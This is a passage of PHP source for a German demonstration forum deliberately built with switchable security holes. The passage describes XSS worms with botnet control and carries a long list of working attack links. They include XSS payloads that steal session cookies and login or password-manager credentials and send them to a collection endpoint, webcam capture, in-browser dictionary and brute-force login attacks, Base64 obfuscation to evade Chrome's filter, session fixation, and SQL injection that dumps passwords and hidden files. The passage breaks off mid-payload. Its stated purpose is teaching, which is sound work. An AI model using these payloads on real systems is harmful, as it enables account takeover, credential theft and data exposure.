* oder sich mit A[[::w/Systema)dministrat(or]]iven Rechten anmelden (//z.B. als der [[^Profil?id=1|erste Benutzer]] des ??if??s//)" : "").(($leak or $status/2%2) ? "
Zur Demonstration wurden einige (//[[^Leak^Sicherheitslücken ein/aus Schalten^|abschaltbare]]//) ??sl??n eingebaut, die das Einschleusen von beliebigen ??pc:C[[::w/Programmc)ode]]?? vom ??wb:[[::w/)Webbrowser]]?? ermöglichen!
Diese Lücken befinden sich in der [[^Such(e?id=&q=]]funktion, [[^Profil(?id=]]anzeige, [[^Abmelde(n?id=]]funktion$info[0], [[^Chat]]-Funktion und im [[::l|Forum]] selbst, die z.B. mit vorgegebenen Beispielen ausgenutzt werden können. ([[#url-attack|//Siehe unten!//]])
Für den Betrieb des ??if??s wird ein A[[:httpd.a)pache(.org]]-Server empfohlen, wo die Directive P[[:httpd.apache.org/docs/current/de/mod/core.html#acceptp)athinfo]] aktiviert ist. Als alternative geht auch der [[??pm??features.commandline.webserver.php|Eingebaute Webserver]] in ??pp:[[::w/)PHP]]??.
Als [[::w/)Datenbank]] wird [[::w/)SQLite]] 2.8 benötigt, was leider nur in ??pp?? zwischen 4.4 und 5.3 unterstützt wird. (//Ab ??pp?? 5.4 ist nur noch [[::w/)SQLite]] 3 verfügbar, was ein zusätzliches [[:mengelke.de/.by|Addon]] erfordert//) ??pp?? sollte so konfiguriert werden, dass G[[??pm??security.g)lobals(.php]] und [[??pm??security.magicquotes.php|Magic Quotes]] deaktiviert ist. Das ??if?? wird mit aktuellen [[:PHP(.net]]-??vn:Versionen?? (//Ab Version 7.0 oder neuer//) wegen [[??pm????rp??.php#??rp??.eval|preg_replace/eval]], nicht mehr funktionieren. (//Dazu wird es in Zukunft **keinen** [[::w/)Workaround]] geben!//)
Alle Beispiel-??ak?? wurden für den [[::w/)Mozilla_Firefox|+]] entwickelt und getestet.
* Für andere ??wb?? wie z.B. [[::w/)Opera]] oder [[::w/)Internet_Explorer]] müssen die ??ak?? eventuell entsprechend angepasst werden.
* Für ??gc:[[::w/)Google_Chrome|+]]?? sind sämtliche ??ak?? mit ??xs??, die per ??hg:[[::w/Hypertext_Transfer_Protocol#HTTP_)GET]]?? über die ??ul:[[::w/Uniform_Resource_Locator|URL]]?? ergeschleust werden, nicht so ohne weiteres möglich, da sie erkannt und größtenteils abgefangen werden! Verschleierte Methoden, wie z.B. ??64:[[::w/)Base64]]?? führen durchaus zum erfolgreichen Angriff! Entsprechende ??ak?? sind mit \"Chrome\" gekenntzeichnet!
* Alle Angriffe laufen über den ??wb?? - d.H. Wird der ??wb?? geschlossen, sind alle Angriffe beendet, bis dieses ??lf:[[::l|Forum]]?? wieder aufgerufen wird.
Für dieses ??lf?? wurden drei verschiedene [[::w/Computerwurm|XSS-Würmer]] //(In unterschiedlichen größen und Eigenschaften)// entwickelt:
* Der **umfangreiche** [[^Worm??qt:.txt^Quelltext anzeigen^??|Bot-Wurm]] (//knapp 3 KB//) kopiert sich in das ??bp:[[::l/Profil|Benutzerprofil]]??. Sobald man im ??lf?? ??am:angemeldet?? ist und sich den Teil anschaut, der vom Wurm Infiziert wurde (z.B. das ??bp??), kopiert sich der Wurm automatisch und unsichtbar in das eigene ??bp?? und greift dabei alle [[^SQL?worm|Persönlichen Daten]] ab. Ist kein Benutzer ??am??, wird das ??li??-Formular modifiziert, um die eingegebenen [[^SQL?account|Login-Daten]] abzugreifen. Anschließend wartet ein eingebauter [[::w/)Bot(net]] via [[^Chat]] auf [[^BNPS??qt??|Befehle]] vom [[::w/Botnet#Command-and-)Control-(Technologien]]Center. (//Rückmeldungen vom Bot sind nur dann Möglich, wenn der Benutzer gerade ??am?? ist//)
* Der [[^Wormy??qt??|einfache Wurm]] (//knapp 500 Bytes//) kopiert sich ebenfalls in das ??bp??, enthält aber dabei keine Tarnmöglichkeit oder weitere Angriffsfunktionen und löscht bei der Infizierung das ursprüngliche ??bp??. Kann dafür optional unsichtbar eine [[::w/)Webseite]] aufrufen.
* Der [[^Wormline??qt??|Mini-Tagline Wurm]] kann sich aufgrund seiner sehr kleinen größe (//ca. 120 Bytes//), nur über ??hg?? in die [[::w/)Tagline]] des aktuellen Benutzers kopieren! Dabei wird auch der Tagline-Text des Benutzers durch den Wurm überschrieben!
Genau genommen ist dieses ??if?? ein Hackerwerkzeug und fällt unter dem [[::w/)Hackerparagraf]], da die einzelnen Beispiel-??ak?? Theoretisch auch auf andere ??ws:[[::w/)Web(seite]]??pr??ae??senzen im Internet angewendet werden können! Genauso wie eine [[::w/)Suchmaschine]] zum suchen von Informationen oder zum aufspühren von anfälligen [[::w/)Webseite]]n eingesetzt werden kann. Der eigentliche Zweck dieses ??if??s dient zur Aufklärung, damit Sie die ??ak?? verstehen und ihre ??ws??auftritte sicher machen können!" : "")."
Das ??if?? selber besteht nur aus einer einzigen [[::w/)Quelltext]]datei und wurde als [[::w/)Proof_of_Concept|+]] für [[::w/Spaghetticode|unübersichtlichen]] und [[::w/Code-Smell|schlechten]] [[::w/)Programmierstil]], ohne eigene [[::w/)Funktion(??wp:_~(Programmierung~)??)]]en geschrieben. (Mit Ausnahme der [[::w/)Chat]]-Funktion und die ??ak??, die auf ??js:[[::w/)JavaScript]]?? basieren). Die [[^Creole^Creole Testen^]]-Formatierung wurde mit einem [[::w/Feld_~(Datentyp~)|Array]] von [[::w/)<<<toutf Regulärer_Ausdruck|Regulären Ausdrücken>>>]] umgesetzt, die Teilweise [[??pm????rp??.php#??rp??.eval|aktiven Code]] beinhalten.
Unterstützt werden alle für Foren üblichen Grundfunktion, wie: [[::w/Moderator_\(Beruf\)|Administration]], [[::w/Datensicherung|Backup]], [[::w/)BBCode]], [[::w/)Benutzerkont(o]]en, [[::w/)Ajax(_??wp??]]-[[::w/)Chat]] (Optional mit [[::w/)<<<toutf Diffie-Hellman(-Schlüsselaustausch>>>]] & [[::w/Advanced_Encryption_Standard|AES]] [[::w/)<<<toutf Ende-zu-Ende-Verschlüsselung>>>]] oder auch [[::w/)Chat]] ohne ??js??), [[::w/)Content-Management-System]], [[::w/)Creole(_\(Markup\)]], Datei-[[::w/)Upload]], [[::w/)Datensicherung]], [[::w/)Debug(ger]]-Modus, [[::w/Atom_\(Format\)|Feeds]], [[::w/)Pagination]], [[::w/)Salt(_~(Kryptologie~)]]-??li??$info[7], [[::w/)Session-(ID]]Sitzung (//Nur mit [[::w/HTTP-)Cookie]]s//), [[::w/)Smil(ey]]ies, [[::w/)Suchfunktion]], [[::w/Kommandozeile|SQLite-Konsole]] und [[::w/)Unicode]]s.
$info[5]
$info[1]
$info[2]
$info[3]
Lizenz zum [[^Source|Quelltext]] des Forums: [[::w/)GNU_General_Public_License|+]] - Projektseite: [[:MEngelke.de(/.by]]<p>© $date by $author</p></div>")
.(($leak or $status/2%2) ? "<p>Server: ".preg_replace('!\s?PHP/[\d.]+|$!'," PHP/".phpversion(),$_SERVER['SERVER_SOFTWARE'],1).(($sql) ? " SQLite/".$sql['lv']() : '')."</p>"
# Hacker-Code um die Sicherheitslücken angreifen zu können
.((($leak or $status/2%2) and $sql and $val = <<<eof
**__++Beschreibung und Erläuterungen++__**:
Die ersten ??al:Angriffslinks?? beschränken sich auf ??xs??, was per ??js?? nur im ??wb?? selbst ausgeführt wird. Man kann beliebige Inhalte auslesen/erzeugen und Benutzereingaben abfangen/einschleusen. Und unter idealen Voraussetzungen, ist es möglich [[::w/Malware|Schadsoftware]] auf dem Anwender-PC zu installieren.
Da ??gc?? die ??ak?? über die ??ul?? erfolgreich abwehren kann, wurden einige ??ak?? (//Nicht alle//) entsprechend mit ??64?? verschleiert und mit "//[[::w/Google_)Chrome]]//" gekennzeichnet. (//Dieser Trick setzt voraus, dass die ??ws??anwendung diese [[::w/Code|Kodierungsart]] unterstützt.//)
Teilweise sind die ??al?? etwas länger geworden (//bis zu 6 KB//). d.H. einige ??wb?? kommen mit den überlangen [[::w/Uniform_Resource_Locator|Urls]] nicht klar. Im dem Fall können Sie die Chrome-Links probieren, da diese durch die alternative [[::w/URL-Encoding|kodierung]] etwas kürzer sind.
Die Login-??ak?? sind Theoretisch auch ohne ??xs?? möglich, da hierbei der Login-Prozess direkt mit [[::w/)<<<toutf Wörterb(uchangriff>>>]]??ue??chern / [[::w/)Brute-Force(-Methode]] angegriffen wird. (//Für solche ??ak?? kommen normalerweise externe Hackerwerkzeuge zum Einsatz!//)
Die ??ak?? mit ??si?? tricksen die ??wa:[[::w/)Webanwendung]]?? aus, um direkt auf die ??db:[[::w/)Datenbank]]?? zugreifen zu können. Da die meisten ??wa?? ihrer eigenen ??db?? vertrauen, werden die Inhalte meistens ungefiltert ausgegeben. Es können dabei auch beliebige (//auch interne und geheime//) Daten ausgelesen werden. Unter bestimmten Bedingungen, können auch Daten verändert oder hinzugefügt werden. Reine ??ak?? mit ??si?? funktionieren auch ohne ??js??, da nicht der ??wb?? vom Anwender, sondern die ??db?? des Betreibers angegriffen wird!
Kombiniert man verschiedene Schwachstellen (//In diesem Fall ??xs?? mit ??si??//), können dadurch neue ??sl??n entstehen, da man die schwächen mit den stärken der einzelnen Varianten ausgleichen kann oder sich hinter einer ??sl?? noch weitere Angriffsmöglichkeiten lauern können.
Ein [[::W/)XSS(_worm]]-Wurm ist besonders gefährlich, weil es nicht von jeden [[::w/)Antivirenprogramm]] gefunden werden kann. Der Wurm wird aus der ??wa?? geladen und kann ohne auf dem [[::w/Personal_)Computer]] gespeichert zu werden, vom ??wb?? ausgeführt werden. Auch wenn die Rechte im ??wb?? sehr bescheiden sind, kann der Wurm dennoch in gewissen Rahmen den ??wb?? kontrollieren. (//z.B. sich weiter verbreiten und die [[::w/)<<<toutf Identität(sdiebstahl>>>]] des Benutzer annehmen oder stehlen//) Steht der Wurm in direkter verbindung zum Angreifer, so kann der "[[::w/)Bot(net]]" jederzeit beliebige [[^BNPS??qt??|Befehle]] auf dem Opfer-PC ausführen. In der Regel ist es ein ganzer Schwarm von [[::w/)Bot(net]]s, die ganze Infrastrukturen angreifen und lahm legen können.
Mit [[::W/)Code_injection|+]] ist alles möglich. Man kann den kompletten Server übernehmen und alles runterladen, was darauf gespeichert ist oder hochladen und ausführen, was man möchte. Die Lücke steckt hier in der [[^Creole]]-Formatierung und muss explizit im [[::w/)Quelltext]] aktiviert werden. Die entsprechenden ??al?? benötigen hier nur zur Präsentation ??xs?? und ??si??. (//Technisch wird nur der Server angegriffen!//)
eof
) ? "<table align='left'><tr><td class='cr'><fieldset><legend><a name='url-attack'><b>URL-Attack</b> <small>(Weitere Informationen in der Link-Beschreibung)</small></a></legend>
<ol><li><a class='wipe' href='$wiki/Cross-Site-Scripting'$tgb>Cross-Site-Scripting</a> (Sicherheitslücke in der <a href='$self/Suche'$sel>Suchfunktion</a>)<ul>
<li><a title='$var[0] ".($k = 'Einen beliebigen Text ausgeben!')."' href='$self/Suche?q=".urlencode($v = "<script>alert('Hello World!')</script>")."'$atk>Hello World!</a> - <a title='$k' href='$self?b=".base64_encode($v)."'$atk><small><em>Chrome</em></small></a>
<li><a title='$var[0] ".($k = 'Forum-Titel beliebig ändern!')."' href='$self/Suche?q=".urlencode($v = strtr(preg_replace($js,'',"<script>
document.getElementsByClassName('title')[0].innerHTML = ' Have a nice day!';
</script>"),$attack))."' onClick='this.href=this.href.replace(/\+.*?(?=%27)/g,prompt(\"Bitte geben Sie einen beliebigen Titel!\",\"Hello World!\"))'$atk>Forum-Titel</a> - <a title='$k' href='$self?b=".base64_encode($v)."'$atk><small><em>Chrome</em></small></a>
<li><a title='$var[0] ".($k = 'Alle Grafiken durch Katzenbilder austauschen!')."' href='$self/Suche?q=".urlencode($v = strtr(preg_replace($js,'',<<<eof
Place Kitten</a><script>
document.body.setAttribute("onload","
for(d=0;d<document.images.length;d++)
document.images[d].src = '_clink_/' + document.images[d].width + '/' + document.images[d].height + '?' + d;
a = document.getElementsByTagName('*');
for(b=0;b<a.length;b++)
if((c = window.getComputedStyle(a[b])) && c.backgroundImage && c.backgroundImage != 'none')
a[b].style.backgroundImage = 'url(_clink_/' + parseInt(c.width) + '/' + parseInt(c.height) + '?' + d++ + ')';");
</script>
eof
)."<a name='cat' rel= \" \">",$attack))."'$atk>Katzenbilder</a>".((substr($attack['_clink_'],0,1) == '/') ? '' : $var[1])." - <a title='$k' href='$self?b=".base64_encode($v)."'$atk><small><em>Chrome</em></small></a>
<li><a title='$var[0] ".($k = 'Einen beliebigen Werbebanner ausgeben!')."' href='$self/Suche?q=".urlencode($v = strtr(preg_replace($js,'',<<<eof
Werbebanner</a>"<script>
(x = document.getElementsByTagName('body')[0]).innerHTML = '<center><a href="_hlink_" target="_blank" onClick=this.href="_elink_"><img src=" _blink_" alt="Werbung" border="0"></a></center>' + x.innerHTML;
</script>
eof
)."<a name='ads' rel= \" \">",$attack))."' onClick='this.href=this.href.replace(/\+http[:%\w.\/-]+(?=%22)/g,prompt(\"Bitte geben Sie eine Banner-URL ein!\",\"$attack[_blink_]\"))'$atk>Werbebanner</a>".((substr($attack['_blink_'],0,1) == '/') ? '' : $var[1])." - <a title='$k' href='$self?b=".base64_encode($v)."'$atk><small><em>Chrome</em></small></a>
<li><a title='$var[0] ".($k = 'Eine beliebige Webseite per iframes anzeigen!')."' href='$self/Suche?q=".urlencode($v = strtr(preg_replace($js,'',<<<eof
<script>
document.getElementsByTagName('body')[0].innerHTML = '<center><iframe src=" _glink_" width="' + (window.innerWidth * 0.97) + '" height="' + (window.innerHeight * 0.97) + '" frameborder="0"></iframe></center>';
</script>
eof
),$attack))."' onClick='this.href=this.href.replace(/\+http[:%\w.-\/]+(?=%22)/g,prompt(\"Bitte geben Sie eine Ziel-Webseite ein!\",\"$attack[_glink_]\"))'$atk>Fremde Seite</a>".((substr($attack['_glink_'],0,1) == '/') ? '' : $var[1])." - <a title='$k' href='$self?b=".base64_encode($v)."'$atk><small><em>Chrome</em></small></a>
<li><a title='$var[0] ".($k = 'Das Flash-Spiel: Nyan Cat Fly starten!')."'href='$self/Suche?q=".urlencode($v = strtr(<<<eof
Nyan Cat Fly!</a> <object width="640" height="480"><param name="movie" value="_nlink_"><embed src="_nlink_" bgcolor="#021a40" width="640" height="480"></object>
eof
,$attack))."'$atk>Nyan Cat Fly!</a>".((substr($attack['_nlink_'],0,1) == '/') ? '' : $var[1])." spielen - <small><a title='$k' href='$self?b=".base64_encode($v)."'$atk><em>Chrome</em></a> (<a href='$attack[_flink_]'$tgb>Flash</a> wird benötigt)</small>
<li><a class='wipe' href='$wiki/Rickrolling'$tgb>Rickrolling</a>: <a title='$var[0] ".($k = 'Ein Video von Rick Astley abspielen!')."' href='$self/Suche?q=".urlencode($v = strtr(<<<eof
Rickrolling</a> <iframe src="_ylink_" width="640" height="480" frameborder="0"></iframe>
eof
,$attack))."'$atk>Never Gonna Give You Up</a>".((substr($attack['_ylink_'],0,1) == '/') ? '' : $var[1])." - <small><a title='$k' href='$self?b=".base64_encode($v)."'$atk><em>Chrome</em></a></small>
<li><a title='$var[0] ".($k = 'Webcam aktivieren und ein Snapschuss machen')."' href='$self/Suche?q=".urlencode($v = 'WebCam</a>"<table border="1" onclick="if(lms)ctx.drawImage(video,0,0,320,240);"><tr><td><video autoplay="true" id="video" width="320" height="240" style="background-color:grey"></video></td><td><canvas id="canvas" width="320" height="240"></canvas></td></tr></table>'.preg_replace($js,"","<script>
var video = document.querySelector('#video'), canvas = document.querySelector('#canvas'), ctx = canvas.getContext('2d'), lms = null;
navigator.getUserMedia = navigator.getUserMedia || navigator.webkitGetUserMedia || navigator.mozGetUserMedia || navigator.msGetUserMedia || navigator.oGetUserMedia;
if(navigator.getUserMedia)
navigator.getUserMedia({video:true},function(stream) { video.src = window.URL.createObjectURL(lms = stream); },function(e){});
</script>")."<span name='' style='display:none'>")."'$atk>Webcam abgreifen</a> - <small><a title='$k' href='$self?b=".base64_encode($v)."'$atk><em>Chrome</em></a> (Geht nur noch bei https und Firefox macht Probleme)</small>
<li><a title='$var[0] ".($k = 'Es schneien zu lassen!')."' href='$self/Suche?q=".urlencode($v = strtr(preg_replace($js,'',<<<eof
Let it Snow</a><script>
var s = [],
margin = [],
mv = [],
crds = [],
lft = [],
color = ["#aaaacc","#ddddFF","#ccccDD"],
type = ["Arial Black","Arial Narrow","Times","Comic Sans MS"],
ie5 = document.all && document.getElementById && !navigator.userAgent.match(/Opera/),
ns6 = document.getElementById && !document.all,
opera = navigator.userAgent.match(/Opera/);
function initsnow() {
margin = ie5 || opera ? [document.body.clientHeight,document.body.clientWidth] : ns6 ? [window.innerHeight,window.innerWidth] : [];
snowsizerange = 22 - 8;
for(i=0;i<=35;i++)
crds[i] = 0,
lft[i] = Math.random() * 15,
mv[i] = 0.03 + Math.random() / 10,
s[i] = document.getElementById("s" + i),
s[i].style.fontFamily = type[Math.floor(Math.random() * type.length)],
s[i].size = Math.floor(Math.random() * snowsizerange) + 8,
s[i].style.fontSize = s[i].size,
s[i].style.color = color[Math.floor(Math.random() * color.length)],
s[i].sink = 0.6 * s[i].size / 5,
s[i].posx = Math.floor(Math.random() * (margin[1] - s[i].size)),
s[i].posy = Math.floor(Math.random() * (2 * margin[0] - margin[0] - 2 * s[i].size)),
s[i].style.left = s[i].posx,
s[i].style.top = s[i].posy;
movesnow();
}
function movesnow() {
for(i=0;i<=35;i++) {
crds[i] += mv[i];
s[i].posy += s[i].sink;
s[i].style.left = s[i].posx + lft[i] * Math.sin(crds[i]);
s[i].style.top = s[i].posy;
if(s[i].posy >= margin[0] - 2 * s[i].size || parseInt(s[i].style.left) > (margin[1] - 3 * lft[i]))
s[i].posx = Math.floor(Math.random() * (margin[1] - s[i].size)),
s[i].posy = 0;
}
var timer = setTimeout("movesnow()",50);
}
for(i=0;i<=35;i++)
document.write("<span id='s" + i + "' style='position:absolute;top:-22'>*</span>");
if(ie5 || ns6 || opera)
window.onload = initsnow;
</script>
eof
)."<a name='snow' rel= \" \">",$attack))."'$atk>Let it snow!</a> - <a title='$k' href='$self?b=".base64_encode($v)."'$atk><small><em>Chrome</em></small></a>
<li><a title='$var[0] ".($k = 'Den aktuellen Session-Cookie klauen und in die Hacker-Datenbank eintragen!')."' href='$self/Suche?q=cookies".urlencode($v = "</a>".preg_replace($js,'',<<<eof
<script>
p = new Image();
p.src = $attack[_jsleak_] + '?href=' + encodeURIComponent(location.host + location.pathname)
+ '&data='+encodeURIComponent(document.cookie) + '&useragent=' + encodeURIComponent(navigator.userAgent);
</script>
eof
)."<a name=\"\" rel= \" \" >")."'$atk>Cookieklau</a> - <small><a title='$k' href='$self?b=".base64_encode($v)."'$atk><em>Chrome</em></a> (<a href='$self/SQL?cookie'$rel$sel>Geklaute Cookies anzeigen</a>)</small>
<li><a title='$var[0] ".($k = 'Die Anmeldedaten im Anmeldefeld werden abfangen und in die Hacker-Datenbank eintragen! Zur Verschleierung wird die fehlgeschlagene Suchausgabe verändert!')."' href='$self/Suche?q=".urlencode($v = "Sexy Milfbuster".str_pad('',20,"\t")."</a> \"".preg_replace($js,'',<<<eof
<script>
var x = document.login;
x.onsubmit = function() {
if(x.username.value + x.password.value != '') {
try {
var p = new XMLHttpRequest();
}
catch(e) {
jsdebug(e);
p = new ActiveXObject('Microsoft.XMLHTTP');
}
p.open('GET',$attack[_jsleak_]
+ '?href=' + encodeURIComponent(location.host + location.pathname)
+ '&data=' + encodeURIComponent(document.cookie
+ '; user=' + x.username.value
+ '; pass=' + x.password.value)
+ '&useragent=' + encodeURIComponent(navigator.userAgent),false);
p.send(null);
}
else
return false;
}
</script>
eof
)." können wegen der Altersbeschränkung angezeigt werden!<br>Bitte loggen Sie sich ein, um das Suchergebnis anzuzeigen! Dann werden alle Suchergebnisse \"<b>UNZENSIERT</b><a name='sex'>")."'$atk>Logindaten abfrangen</a> - <small><a title='$k' href='$self?b=".base64_encode($v)."'$atk><em>Chrome</em></a> (<a href='$self/SQL?account'$rel$sel>Geklaute Zugangsdaten anzeigen</a>)</small>
<li><a title='".($k = 'Bei Aufruf der Suchfunktion, werden die automatisch eingetragenen Benutzerdaten vom Passwordmanager in die Hacker-Datenbank überführt!')."' href='$self/Suche?q=".urlencode($v = strtr("Snoopy".str_pad('',16,"\t").<<<eof
</a>" angezeigt!<form name='hack' style='margin:0'><div style='display:none'><input type='text' name='username' onchange='hack()'><input type='password' name='password'></div></form><script>
eof
.preg_replace($js,'',<<<eof
var x = document.hack;
function hack() {
if(x.username.value + x.password.value != '') {
p = new Image(),
p.src = $attack[_jsleak_]
+ '?href=' + encodeURIComponent(location.host + location.pathname)
+ '&data=' + encodeURIComponent(document.cookie
+ '; user=' + x.username.value
+ '; pass=' + x.password.value)
+ '&useragent=' + encodeURIComponent(navigator.userAgent);
}
}
window.setTimeout('hack()',1000);
eof
)."</script><a style='display:none' name= ' '",$attack))."'$atk>Accountdaten vom Passwordmanager</a> - <small><a title='$k' href='$self?b=".base64_encode($v)."'$atk><em>Chrome</em></a> (<a href='$self/SQL?account'$rel$sel>Zugangsdaten anzeigen</a>)</small>
<li><a title='".($k = 'Bei Aufruf der Suchfunktion, wird versucht per Passwort-Liste das Login-Kennwort zu ermitteln!')."' href='$self/Suche?q=".urlencode($v = strtr("Wordbook Attack".'</a>" angezeigt!<script>'.preg_replace($js,'',"
try {
var A = new XMLHttpRequest();
}
catch(e) {
jsdebug(e);
A = new ActiveXObject('Microsoft.XMLHTTP');
}
var B = document.login;
x = document.createElement('textarea'),
x.rows = '8',
x.cols = '15',
x.name = 'password',
x.style.width = '100%',
x.value = ' _wordlist_ '.replace(/\s/g,'\\n');
B.password.parentNode.replaceChild(x,B.password);
B.login.setAttribute('onclick','putlogin();return false');
function putlogin() {
if(A && B.username.value != '' && (x = B.password.value.match(/^[^\\r\\n]*(?!$)/))) {
x = 'login=Ok&username=' + escape(B.username.value) + '&password=' + escape(x);
A.open('POST',location.pathname + '?request=Suche',true);
A.setRequestHeader('Content-type','application/x-www-form-urlencoded');
A.setRequestHeader('Content-length',x.length);
A.setRequestHeader('Connection','close');
A.onreadystatechange = getlogin;
A.send(x);
}
else
alert('Kennwort war nicht dabei!');
}
function getlogin() {
if(A && A.readyState == 4 && A.status == 200) {
if(A.responseText.match(/<form name='login'/)) {
B.password.value = B.password.value.replace(/^.*[\\r\\n]*/,'');
return putlogin();
}
else {
alert(B.password.value.match(/^.*/));
location.href = location.pathname;
}
}
}")."</script><a style='display:none' name= ' '",$attack))."'$atk>Login-Passwörter mit Wörterbuch durchprobieren</a> - <small><a title='$k' href='$self?b=".base64_encode($v)."'$atk><em>Chrome</em></a></small>
<li><a title='".($k = 'Bei Aufruf der Suchfunktion, werden per Brute-Force alle Kennwörter durchprobiert!')."' href='$self/Suche?q=".urlencode($v = strtr("Brute-Force Attack"."</a>\" angezeigt!<script>".preg_replace($js,'',"
try {
var A = new XMLHttpRequest();
}
catch(e) {
jsdebug(e);
A = new ActiveXObject('Microsoft.XMLHTTP');
}
var B = document.login,C,D,x,y;
x = document.createElement('div'),
x.innerHTML = '<small>Charset:</small><br><input type=\"text\" name=\"charset\" value=\"_charlist_\"><br><small>Min / Max Kennwortlänge:</small><br><input type=\"text\" size=\"2\" name=\"min\" value=\"3\"> / <input type=\"text\" size=\"2\" name=\"max\" value=\"6\">';
B.info.parentNode.replaceChild(x,B.info);
B.password.setAttribute('type','text');
B.password.setAttribute('readonly',0);
B.password.setAttribute('tabindex',4);
x = document.createElement('input'),
x.type = 'button',
x.name = 'stop',
x.value = 'Stop';
B.login.parentNode.insertBefore(x,B.login.nextSibling);
B.stop.setAttribute('onclick','B.username.value=\"\"');
B.login.setAttribute('onclick','initpass(); return false');
function initpass() {
C = [],
D = [1,parseInt(new Date().getTime(),10)];
for(x=0;x<B.min.value;x++)
C[x] = B.charset.value.length-1;
makepass();
putlogin();
}
function makepass() {
y = '';
for(x in C)
y += B.charset.value.substr(C[x],1);
B.password.value = y;
}
function nextpass() {
y = 0,
D[0]++;
for(x in C) {
if(C[x]-- > 0) {
y = 0;
break;
}
else
C[x] = B.charset.value.length-1;
y = 1;
}
if(y == 1 && parseInt(x,10) + 1 == C.length)
if(C.length == parseInt(B.max.value,10))
C = false;
else
C.push(B.charset.value.length-1);
return C;
}
function putlogin() {
if(A && B.username.value != '' && B.password.value != '') {
x = 'login=Ok&username=' + escape(B.username.value) + '&password=' + escape(B.password.value);
A.open('POST',location.pathname + '?request=Suche',true);
A.setRequestHeader('Content-type','application/x-www-form-urlencoded');
A.setRequestHeader('Content-length',x.length);
A.setRequestHeader('Connection','close');
A.onreadystatechange = getlogin;
A.send(x);
}
else
B.password.value = '';
}
function getlogin() {
if(A && A.readyState == 4 && A.status == 200) {
if(A.responseText.match(/<form name='login'/)) {
if(nextpass())
return putlogin(makepass());
}
else {
alert('Kennwort:' + ' ' + B.password.value + '\\nVersuche:' + ' ' + D[0] + '\\n' + (Math.round(D[0]/Math.round((new Date().getTime()-D[1])/1000)*100)/100) + ' Versuche pro Sekunde');
location.href = location.pathname;
}
}
}
")."</script><a style='display:none' name= ' '",$attack))."'$atk>Login-Passwörter per Brute-Force durchprobieren</a> - <small><a title='$k' href='$self?b=".base64_encode($v)."'$atk><em>Chrome</em></a></small>
</li></ul><li><a class='wipe' href='$wiki/Session-ID'$tgb>Session-ID</a>-Angriffe durch <a class='wipe' href='$wiki/Session_Fixation'$tgb>Festlegung</a> und <a class='wipe' href='$wiki/Session_Hijacking'$tgb>Enführung</a><ul>
<li><a title='Diesen Link auf einen zweiten Browser aufrufen und beide Browser laufen mit der selben Session! (D.H. Es ist nicht erforderlich Anmeldedaten zu entwenden!)' href='$self?".session_name()."=".session_id()."'$atk>Session_Fixation</a>
</li></ul><li><a class='wipe' href='$wiki/SQL-Injection'$tgb>SQL-Injection</a> (Sicherheitslücke in der <a href='$self/Profil?id=-1'$sel>Profilanzeige</a> - zum Daten auslesen)<ul>
<li><a title='Einen beliebigen Text als Benutzerprofil ausgeben!' href='$self/Profil?id=".str_replace(' ','+',<<<eof
-1 union select $sij[1]"SQL-Injection" as username,$sij[2]" Hello World!" as profil
eof
)."' onClick='this.href=this.href.replace(/\+(\w+\+\+[\w!]+)/,prompt(\"Bitte geben Sie einen Text ein!\",\"Hello World!\"))'$atk>Hello World!</a>
<li><a title='Einen beliebigen Werbebanner als Benutzerprofil ausgeben!' href='$self/Profil?id=".urlencode(str_replace('//','//',strtr(<<<eof
-1 union select $sij[1]"Werbung" as username,$sij[2]"<center><a href='_hlink_'$tgb onClick=this.href='_elink_'><img src=' _blink_' alt='Werbung' border='0'></a></center>" as profil
eof
,$attack)))."' onClick='this.href=this.href.replace(/\+http[^+]+(?=%\w+\+)/,encodeURIComponent(prompt(\"Bitte geben Sie eine Banner-URL ein!\",\"$attack[_blink_]\")))'$atk>Werbebanner</a>".((substr($attack['_blink_'],0,1) == '/') ? '' : $var[1])."
<li><a title='".($k = 'Eine beliebige Webseite als Benutzerprofil ausgeben!')."' href='$self/Profil?id=".urlencode(strtr("-1 union select $sij[1]'".($a = '_glink_ ')."' as username,$sij[2]\"".($v = "<center><iframe src='_glink_ ' width='100%' height='400' frameborder='0'></iframe></center>")."\" as profil",$attack))."' onClick='this.href=this.href.replace(/(http[%\dA-F]+)[%\w.-\/]+\+(?=%27)/g,\"$1\"+prompt(\"Bitte geben Sie eine Ziel-Webseite ein!\",\"".str_replace('http://','',$attack['_glink_'])."\"))'$atk>Fremde Seite</a>".((substr($attack['_glink_'],0,1) == '/') ? '' : $var[1])." <small><a title='$k' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"".strtr("$a for Chrome",$attack)."\" as username,$sij[2]b64d(\"".base64_encode(strtr($v,$attack))."\") as profil")."'$atk><em>Chrome</em></a></small>
<li><a title='Einen beliebigen Select-Befehl ausführen!' href='$self/Profil?id=".str_replace(' ','+',<<<eof
-1 union select $sij[1]"SQL-Query" as username,$sij[2](SELECT username||" - "||password FROM user WHERE id=1) as profil
eof
)."' onClick='this.href=this.href.replace(/(SELECT.*?(?=\)))/,prompt(\"Bitte geben Sie einen Select-Befehl ein!\",\"select passhelp from user where id=1\"))'$atk>Select-Befehl ausführen</a>
<li><a title='Durch Eingabe eines CMS-Namen oder einer CMS-ID kann jede CMS-Seite aus der Datenbank als Benutzerprofil angezeigt werden. Unabhängig davon, ob die Seite Öffendlich, für Benutzer oder noch gesperrt sind!' href='$self/Profil?id=".urlencode(<<<eof
-1 union select $sij[1]ifnull(name,'Startseite')||' - '||ifnull(description,'Keine Beschreibung') as username,$sij[2]content as profil from cms where id=' 1' or name like ' 1'
eof
)."' onClick='this.href=this.href.replace(/\+1/g,prompt(\"Geben Sie eine CMS-ID ein!\",1))'$atk>Jede CMS-Seite anzeigen</a>
<li><a title='Durch Eingabe eines Dateinamen oder einer Datei-ID kann jeder Datei-Upload aus der Datenbank im Benutzerprofil angezeigt werden. Unabhängig davon, ob der Upload Öffendlich, für Benutzer oder gesperrt ist!' href='$self/Profil?id=".urlencode(<<<eof
-1 union select $sij[1]name||" - "||size||" Bytes - "||info as username,$sij[2]"<iframe src='data:"||type||";base64,"||data||"' width='100%' height='400'></iframe>" as profil from file where id=' 1' or name like ' 1'
eof
)."' onClick='this.href=this.href.replace(/\+1/g,prompt(\"Geben Sie einen Dateinamen oder eine Datei-ID ein!\",1))'$atk>Jeden Datei-Upload anzeigen</a>
<li><a title='Durch Eingabe einer Betrags-ID kann jeder Betrag aus der Datenbank als Benutzerprofil angezeigt werden. Unabhängig davon, ob der Beitrag Öffendlich, Privat oder gesperrt wurde!' href='$self/Profil?id=".urlencode(<<<eof
